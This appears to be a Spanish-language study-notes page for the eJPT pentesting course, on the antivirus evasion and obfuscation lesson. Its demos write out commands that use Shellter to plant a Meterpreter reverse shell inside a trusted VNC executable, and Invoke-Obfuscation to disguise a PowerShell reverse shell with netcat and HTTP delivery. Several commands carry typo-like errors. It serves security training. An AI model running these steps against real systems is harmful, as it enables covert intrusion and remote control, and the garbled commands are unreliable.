eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • AV Evasion With Shellter
  • Defense Evasion
  • AV Detection Methods
  • AV Evasion Techniques
  • Demo: AV Evasion With Shellter
  • Quiz: AV Evasion With Shellter
  • Obfuscating PowerShell Code
  • Obfuscation
  • Invoke-Obfuscation
  • Demo: Obfuscating PowerShell Code
  • Quiz: Obfuscating PowerShell Code
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Exploitation

Obfuscation

AV Evasion & Obfuscation

AV Evasion With Shellter

En este modulo se vera la forma de evadir soluciones de antivirus basados en firmas.

Defense Evasion

La evasión de defensa consiste en técnicas que utilizan los adversarios para evitar ser detectados durante el ataque. Las técnicas utilizadas para la evasión de defensa incluyen la desinstalación o desactivación del software de seguridad o la ofuscación o encriptación de datos y scripts. Los adversarios también aprovechan y abusan de los procesos confiables para ocultar y enmascarar su malware. — MITRE

AV Detection Methods

El software antivirus normalmente utiliza detección basada en firmas, heurística y comportamiento.

  1. Siqnature based detection: Una firma de antivirus es una secuencia única de bytes que identifica de forma única el malware. Como resultado, deberá asegurarse de que su exploit o carga útil ofuscada no coincida con ninguna firma conocida en la base de datos de antivirus.

Podemos eludir la detección basada en firmas modificando la secuencia de bytes del malware, cambiando así la firma.

  1. Heuristic-based detection: Se basa en reglas o decisiones para determinar si un binario es malicioso. También busca patrones específicos dentro del código o las llamadas del programa.

  2. Behavior based detection: Se basa en la identificación del malware mediante el monitoreo de su comportamiento. (Se utiliza para las nuevas cepas de malware)

AV Evasion Techniques

On-disk Evasion Techniques

  • Obfuscation: La ofuscación se refiere al proceso de ocultar algo importante, valioso o crítico. La ofuscación reorganiza el código para dificultar su análisis o RE.

  • Encoding: La codificación de datos es un proceso que implica cambiar los datos a un nuevo formato mediante un esquema. La codificación es un proceso reversible; los datos se pueden codificar a un nuevo formato y decodificar a su formato original.

  • Packing: Genera un ejecutable con una nueva estructura binaria con un tamaño más pequeño y, por lo tanto, proporciona a la carga útil una nueva firma.

  • Crypters: Cifran el código o las cargas útiles y descifran el código cifrado en la memoria. La clave o función de descifrado generalmente se almacena en un stub.

Técnicas de evasión en memoria Se centra en la manipulación de la memoria y no escribe archivos en el disco. • Inyecta la carga útil en un proceso aprovechando varias API de Windows. Luego, la carga útil se ejecuta en la memoria en un subproceso independiente.

In-Memory Evasion Techniques

  • Se centra en la manipulación de la memoria y no escribe archivos en el disco.

  • Inyecta la carga útil en un proceso aprovechando varias API de Windows.

  • Luego, la carga útil se ejecuta en la memoria en un subproceso independiente.

Demo: AV Evasion With Shellter

sudo apt-get install shell ter -y
sudo apt-get install wine32

cd /usr/share/windows-resources/shellter
sudo wine shellter.exe

# Pude copiar un ejecutable de confianza como lo es VNC
# Kali tiene binarios de windows que puede utilizar
/usr/share/windows-binaries/

sudo wine shellter.exe
Choose Operation Mode - Auto/Manua1 (A/M/H): A
PE Target: / home/ka1i/Desktop/AVBypass/vncviewer.exe
Enable Stealth Mode? (Y/N/H): y 
Use a listed payload or custom? (L/C/H): L
Select payload by index: 1

SET LHOST: 10. 10. 10.10
SET LPORT: 1234

# Remplazara el ejecutable que se especifico

# Transferir el ejecutable al objetivo
sudo python3 -m http.server 80
# Metasploit escucha
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run
# Ejecutar el ejecutable desde el objetivo y tendremos conexion

Quiz: AV Evasion With Shellter

Obfuscating PowerShell Code

Obfuscation

La ofuscación se refiere al proceso de ocultar algo importante, valioso o crítico. La ofuscación reorganiza el código para dificultar su análisis o RE.

Como evaluador de penetración, trabajará con código PowerShell con frecuencia. La mayoría de las soluciones de antivirus marcarán inmediatamente el código PowerShell malicioso, por lo que debe poder ofuscar/codificar su código y scripts de PowerShell para evitar su detección.

Invoke-Obfuscation

  • Invoke-Obfuscation es un ofuscador de comandos y scripts de PowerShell compatible con PowerShell v2.O+ de código abierto.

Repositorio de GitHub: https://qithub.com/danielbohannon/Invoke-Obfuscation

Demo: Obfuscating PowerShell Code

sudo apt-get install powershell -y
#Claonar  el repositorio
# Ingresar al respositorio
pwsh 
Import-Module . / Invoke-Obfuscation. psdl

Invoke-Obfuscation> SET SCRIPTPATH /home/ka1i/Desktop/AVBypass/shell.ps1
Invoke-Obfuscation> ENCODING
Invoke-0bfuscation\Encoding> ASCII
Invoke-Obfuscation\Encoding> 1

# Puede resetear todos los comandos aplciados
Invoke-Obfuscation> SET SCRIPTPATH /home/ka1i/Desktop/AVBypass/shell.ps1
Invoke-0bfuscation\Encoding> RESET
Invoke-0bfuscation\Encoding> BACK

# Aplicamos otro metodo de ofuscacion

Invoke-Obfuscation> AST
Invoke-0bfuscation\AST> ALL
Invoke-Obfuscation\AST\ALL> 1

# Transferir el script al objetivo
$ nc -nvlp 1234
$ sudo python3 -m http. server 80

# En el sistema windwos descargar el powershell ofuscado

Quiz: Obfuscating PowerShell Code

PreviousLinuxNextHost & Network Penetration Testing: Post-Exploitation

Last updated 8 months ago

ShellterShellter
Logo